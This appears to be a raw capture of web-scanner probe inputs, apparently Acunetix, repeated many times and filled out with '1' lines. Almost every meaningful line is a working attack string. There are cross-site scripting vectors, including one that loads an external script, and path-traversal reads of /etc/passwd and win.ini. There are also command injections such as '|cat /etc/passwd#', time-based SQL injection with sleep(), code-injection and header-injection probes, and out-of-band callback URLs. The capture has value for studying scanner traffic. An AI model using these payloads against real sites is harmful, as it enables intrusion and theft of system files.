YlS1cDLA')

1<input autofocus onfocus=prompt(912214)>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

'

^(#$!@#$)(()))******

ky6rkPfM'))

'

1

<a href='http://www.acunetix.com'>website security</a>

testasp.vulnweb.com

1

-1

"

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

[url=http://www.acunetix.com]website security[/url]

1

${@print(md5(acunetix_wvs_security_test))}

-1)

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

||cat /etc/passwd

1

acunetix_wvs_invalid_filename

1

${@print(md5(acunetix_wvs_security_test))}\

1

1_ca6Vm <ScRiPt >prompt(983682)</ScRiPt>

1

-1))

comments

1

&dir

1

1

1

http://hitvaHKZMxUrr.bxss.me/

comments

ZDGhBQXj'

1

1

'&dir&'

file:///etc/passwd

1

1

1

1

T1IknjRF')

comments/.

1

1

/\../\../\../\../\../\../\../etc/passwd

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

"&dir&"

1

'"

HpnO70Hp'))

1

1

1

WEB-INF/web.xml

1

|dir

1

1

<!--

WEB-INF\web.xml

1'"()&%<ScRiPt >prompt(953522)</ScRiPt>

1

1

1

../../../../../../../../../../windows/win.ini

1

'|dir

1

'"()&%<ScRiPt >prompt(924889)</ScRiPt>

../../../../../../../../../../boot.ini

1

1

1_959468

"|dir

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

acu7141\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7141

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

acux1564\xc0\xbez1\xc0\xbcz2a\x90bcxuca1564

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(913655)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<script>prompt(989353)</script>

1

1

1

1<ScRiPt >prompt(916455)</ScRiPt>

1

1

1

WEB-INF/web.xml

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?955787></ScRiPt>

1

1

1

1<ScRiPt >prompt(912814)</ScRiPt>

WEB-INF\web.xml

1

1<video><source onerror="javascript:prompt(959347)">

1

1

1

response.write(9783213*9582676)

1

&cat /etc/passwd&

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(982183)"></g></svg>

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

'+response.write(9783213*9582676)+'

1

1

1<div style=width:expression(prompt(910186))>

'&cat /etc/passwd&'

1

1

"+response.write(9783213*9582676)+"

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

"&cat /etc/passwd&"

1<iframe src='data:text/html

${99818+99076}

1

1

1

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<body onload=prompt(979877)>

1

cat /etc/passwd

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1some_inexistent_file_with_long_name%00.jpg

1

1

1&n904144=v996797

`cat /etc/passwd`

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(995458)>

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

1

)

|cat /etc/passwd#

1<img src=xyz OnErRor=prompt(965868)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

1

1

-1)

1

1<img/src=">" onerror=alert(924977)>

!(()&&!|*|*|

'|'ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

-1))

'"()

1

1

/etc/passwd

"|"ld

^(#$!@#$)(()))******

'

1<ScRiPt%20>prompt(940724)</sCripT>

1

1

Q53SNKH4'

1

1

"

1&lt

1

1

1

kLlEMLE9')

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

\xf6<img acu onmouseover=prompt(913818) //\xf6>

${@print(md5(acunetix_wvs_security_test))}

'

1

http://hitnQsGod0Ry4.bxss.me/

UYjhfrZp'))

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

${@print(md5(acunetix_wvs_security_test))}\

1<input autofocus onfocus=prompt(981984)>

1

1

1

acunetix_wvs_invalid_filename

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

<a href='http://www.acunetix.com'>website security</a>

||cat /etc/passwd

comments

1

-1)

1

1

http://www.acunetix.tst

-1))

&dir

comments

[url=http://www.acunetix.com]website security[/url]

1

kY1IIVuW'

file:///etc/passwd

1'"()&%<ScRiPt >prompt(917638)</ScRiPt>

1

'"

1

comments/.

1_1lXfm <ScRiPt >prompt(945544)</ScRiPt>

1

'&dir&'

1

<!--

'"()&%<ScRiPt >prompt(916296)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

tlyNAsR2')

1

1

1

1

1

"&dir&"

pj3mOflK'))

WEB-INF/web.xml

1_907095

1

|dir

1

1

1

1

1

WEB-INF\web.xml

'|dir

1

1

1

"|dir

../../../../../../../../../../windows/win.ini

1

1

1

1

1

acu1990\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1990

1

../../../../../../../../../../boot.ini

acux7868\xc0\xbez1\xc0\xbcz2a\x90bcxuca7868

1

1<ScRiPt >prompt(908922)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<script>prompt(998333)</script>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(959709)</ScRiPt>

1

1

................windowswin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?917962></ScRiPt>

1

1

1<ScRiPt >prompt(911848)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<video><source onerror="javascript:prompt(924651)">

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(952927)"></g></svg>

1

1

response.write(9525956*9998129)

1

1<div style=width:expression(prompt(902378))>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

'+response.write(9525956*9998129)+'

1

&cat /etc/passwd&

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<iframe src='data:text/html

"+response.write(9525956*9998129)+"

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1<body onload=prompt(990526)>

../../../../../../../../../../etc/passwd

${99601+100304}

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(947010)>

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

1

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

WEB-INF/web.xml

cat /etc/passwd

1

1<img src=xyz OnErRor=prompt(992191)>

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

WEB-INF\web.xml

`cat /etc/passwd`

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1some_inexistent_file_with_long_name%00.jpg

1&n937089=v951279

|cat /etc/passwd#

1

)

1<img/src=">" onerror=alert(984212)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<ScRiPt%20>prompt(912864)</sCripT>

1

!(()&&!|*|*|

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

-1)

"|"ld

'"()

1

^(#$!@#$)(()))******

1

1&lt

1

-1))

'

1

/etc/passwd

\xf6<img acu onmouseover=prompt(916230) //\xf6>

1

1

1

1

'

1

"

se4nOg51'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<input autofocus onfocus=prompt(926297)>

"

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

<a href='http://www.acunetix.com'>website security</a>

stMI2A4q')

1

${@print(md5(acunetix_wvs_security_test))}

[url=http://www.acunetix.com]website security[/url]

1

1

||cat /etc/passwd

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}\

jy7GD59Y'))

1_vaIvC <ScRiPt >prompt(997214)</ScRiPt>

1

http://hitAcP31Fxr7D.bxss.me/

1

1

&dir

1

1

-1

acunetix_wvs_invalid_filename

1

1

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

file:///etc/passwd

1

1

1

comments

-1)

"&dir&"

1

1

1

/\../\../\../\../\../\../\../etc/passwd

http://www.acunetix.tst

1

comments

1'"()&%<ScRiPt >prompt(927034)</ScRiPt>

|dir

'"

-1))

comments/.

1

WEB-INF/web.xml

1

1

59EEQBhq'

'"()&%<ScRiPt >prompt(953541)</ScRiPt>

<!--

'|dir

2TaZ6mEy')

1

1

1

WEB-INF\web.xml

"|dir

1

1_919953

2Lc6EHaG'))

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

acu6847\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6847

1

1

acux9416\xc0\xbez1\xc0\xbcz2a\x90bcxuca9416

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(957044)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1<script>prompt(925650)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(949439)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?951307></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(953431)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(990610)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(987062)"></g></svg>

1

1

WEB-INF/web.xml

1

1

1<div style=width:expression(prompt(938716))>

response.write(9974649*9505796)

1

1

WEB-INF\web.xml

1

1

1

1<iframe src='data:text/html

'+response.write(9974649*9505796)+'

1

1

1

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(984097)>

"+response.write(9974649*9505796)+"

1

1

1

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(930805)>

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

"&cat /etc/passwd&"

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<img src=xyz OnErRor=prompt(974667)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd.jpg

1

cat /etc/passwd

1

1

1<img/src=">" onerror=alert(966016)>

-1

${99980+99768}

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1)

1

1<ScRiPt%20>prompt(966585)</sCripT>

`cat /etc/passwd`

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&n901103=v910570

1&lt

1

|cat /etc/passwd#

1some_inexistent_file_with_long_name%00.jpg

1

ChglpMX4'

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

1

\xf6<img acu onmouseover=prompt(992085) //\xf6>

1

/etc/passwd

)

enzuoxhz')

testasp.vulnweb.com

1

'"()

1<input autofocus onfocus=prompt(980107)>

"|"ld

1

RFGAGoGU'))

!(()&&!|*|*|

http://testasp.vulnweb.com/t/xss.html?%00.jpg

<a href='http://www.acunetix.com'>website security</a>

'

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

-1

1

1

^(#$!@#$)(()))******

[url=http://www.acunetix.com]website security[/url]

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'

1

1

${@print(md5(acunetix_wvs_security_test))}

-1)

1

1

1_30IHw <ScRiPt >prompt(974717)</ScRiPt>

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1))

1

${@print(md5(acunetix_wvs_security_test))}\

http://hitcDhe70jlFh.bxss.me/

"

1

acunetix_wvs_invalid_filename

1

1

1

PDuiBAoc'

||cat /etc/passwd

1

comments

1

1

&dir

1

XI0eprHt')

1

1

file:///etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

'&dir&'

http://www.acunetix.tst

1

1

MW6QObCP'))

1

/\../\../\../\../\../\../\../etc/passwd

1

"&dir&"

1

comments/.

1

'"

WEB-INF/web.xml

1

1'"()&%<ScRiPt >prompt(919789)</ScRiPt>

1

|dir

1

'"()&%<ScRiPt >prompt(999488)</ScRiPt>

1

WEB-INF\web.xml

<!--

'|dir

1

1_927080

1

1

1

../../../../../../../../../../windows/win.ini

"|dir

1

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

acu8878\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8878

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

acux5592\xc0\xbez1\xc0\xbcz2a\x90bcxuca5592

1

................windowswin.ini

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(913499)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<script>prompt(933141)</script>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(997032)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?917270></ScRiPt>

1

1

response.write(9026465*9757208)

1

1<ScRiPt >prompt(952596)</ScRiPt>

1

WEB-INF/web.xml

1

1

&cat /etc/passwd&

1<video><source onerror="javascript:prompt(924893)">

'+response.write(9026465*9757208)+'

1

1

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9026465*9757208)+"

1

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(984532)"></g></svg>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

1<div style=width:expression(prompt(985083))>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

${100358+100188}

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

cat /etc/passwd

1

1

../../../../../../../../../../etc/passwd.jpg

1

1<iframe src='data:text/html

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

`cat /etc/passwd`

1

1

1

1

1<body onload=prompt(961293)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

-1

1

1

)

1&n921785=v918296

|cat /etc/passwd#

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(980265)>

1

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

1

!(()&&!|*|*|

1<img src=xyz OnErRor=prompt(904203)>

'|'ld

1

1

-1))

1

^(#$!@#$)(()))******

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1<img/src=">" onerror=alert(964007)>

1

6NSVT4hD'

"|"ld

1

1<ScRiPt%20>prompt(940260)</sCripT>

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'

'"()

qf48PyfI')

1

1

1

1&lt

/etc/passwd

'

"

1

6Lz9nkNl'))

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

${@print(md5(acunetix_wvs_security_test))}

\xf6<img acu onmouseover=prompt(957817) //\xf6>

1

-1

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

-1)

acunetix_wvs_invalid_filename

1<input autofocus onfocus=prompt(905034)>

||cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

http://hitZDSlIWm4KQ.bxss.me/

-1))

<a href='http://www.acunetix.com'>website security</a>

comments

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

comments

[url=http://www.acunetix.com]website security[/url]

VnYMEnpG'

1

1

1

'&dir&'

1

1

http://www.acunetix.tst

tJAHjJsf')

comments/.

1_XvZQu <ScRiPt >prompt(928378)</ScRiPt>

file:///etc/passwd

"&dir&"

1'"()&%<ScRiPt >prompt(948511)</ScRiPt>

'"

1

1

1

1

cA3PX3Un'))

1

/\../\../\../\../\../\../\../etc/passwd

1

<!--

'"()&%<ScRiPt >prompt(919489)</ScRiPt>

|dir

1

WEB-INF/web.xml

1

1

1

'|dir

1_960480

1

1

1

1

WEB-INF\web.xml

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

../../../../../../../../../../boot.ini

acu1199\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1199

1

1

../../../../../../../../../../windows/win.ini.jpg

acux9668\xc0\xbez1\xc0\xbcz2a\x90bcxuca9668

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(944711)</ScRiPt>

1

................windowswin.ini

1

1

1<script>prompt(966206)</script>

1

1<ScRiPt >prompt(935050)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?926397></ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(981154)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(985327)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(919406)"></g></svg>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

response.write(9397400*9509185)

1<div style=width:expression(prompt(977574))>

1

1

1

1

'+response.write(9397400*9509185)+'

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

1

WEB-INF/web.xml

../../../../../../../../../../etc/passwd

"+response.write(9397400*9509185)+"

1

1

1<body onload=prompt(990362)>

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

WEB-INF\web.xml

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(968065)>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(981101)>

1

../../../../../../../../../../etc/passwd.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

${99819+99503}

cat /etc/passwd

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img/src=">" onerror=alert(929213)>

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

1&n957767=v951202

1

`cat /etc/passwd`

1

1some_inexistent_file_with_long_name%00.jpg

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1<ScRiPt%20>prompt(952572)</sCripT>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

)

|cat /etc/passwd#

1

-1))

1

1&lt

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

1

'|'ld

7PrhLE35'

!(()&&!|*|*|

1

\xf6<img acu onmouseover=prompt(979532) //\xf6>

1

'"()

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

1

"|"ld

1

ksDvUBpU')

1

1

1

'

1<input autofocus onfocus=prompt(964047)>

/etc/passwd

1

6gZ4KjYB'))

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

"

-1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

-1)

${@print(md5(acunetix_wvs_security_test))}

[url=http://www.acunetix.com]website security[/url]

acunetix_wvs_invalid_filename

"

1

http://hit4MlrMb97Ei.bxss.me/

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1))

1

1_Nzd33 <ScRiPt >prompt(915676)</ScRiPt>

comments

${@print(md5(acunetix_wvs_security_test))}\

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

||cat /etc/passwd

1

1

1

Jj6nnoC5'

1

&dir

http://www.acunetix.tst

1

comments

file:///etc/passwd

1

ChhHr4DW')

'"

1

1

'&dir&'

1'"()&%<ScRiPt >prompt(925315)</ScRiPt>

comments/.

<!--

zgbzqKll'))

1

/\../\../\../\../\../\../\../etc/passwd

1

1

"&dir&"

'"()&%<ScRiPt >prompt(924108)</ScRiPt>

1

1

1

1

WEB-INF/web.xml

1

1

1_947346

|dir

1

1

1

'|dir

1

1

WEB-INF\web.xml

1

"|dir

1

1

1

../../../../../../../../../../windows/win.ini

1

acu3824\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3824

1

1

1

../../../../../../../../../../boot.ini

1

acux3849\xc0\xbez1\xc0\xbcz2a\x90bcxuca3849

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(944237)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<script>prompt(980237)</script>

1

1

1

................windowswin.ini

1

1<ScRiPt >prompt(965128)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?909435></ScRiPt>

1

1

1

1

1<ScRiPt >prompt(906920)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(941702)">

1

1

response.write(9452148*9350736)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(915619)"></g></svg>

1

1

1

'+response.write(9452148*9350736)+'

&cat /etc/passwd&

1

1<div style=width:expression(prompt(919970))>

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

"+response.write(9452148*9350736)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

'&cat /etc/passwd&'

1<iframe src='data:text/html

1

../../../../../../../../../../etc/passwd

1

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<body onload=prompt(995274)>

1

"&cat /etc/passwd&"

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

cat /etc/passwd

${99704+100041}

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(991606)>

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

-1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img src=xyz OnErRor=prompt(905245)>

1

`cat /etc/passwd`

1

1

-1)

1

1&n916328=v913957

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

)

|cat /etc/passwd#

1<img/src=">" onerror=alert(948254)>

1

1

-1))

